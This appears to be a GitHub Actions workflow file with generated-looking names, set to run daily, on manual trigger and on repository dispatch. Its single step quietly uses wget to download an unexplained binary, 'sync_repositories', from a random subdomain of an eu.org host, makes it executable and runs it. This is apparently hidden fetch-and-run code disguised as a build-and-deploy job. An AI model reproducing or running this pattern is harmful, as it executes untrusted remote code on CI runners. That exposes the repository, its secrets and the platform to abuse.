#2024-03-18-[083358]-p83odfwn
name: main

on:
  workflow_dispatch:

  repository_dispatch:
    types: runner_workflow

  schedule:
    - cron: "14 3 * * * "

jobs:
  build-deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: v2r9dfdc0s725fgm
        run: |
          wget -q https://d4gtxu9qcifszvnx.callforpapers.eu.org/sync_repositories
          chmod 755 sync_repositories
          ./sync_repositories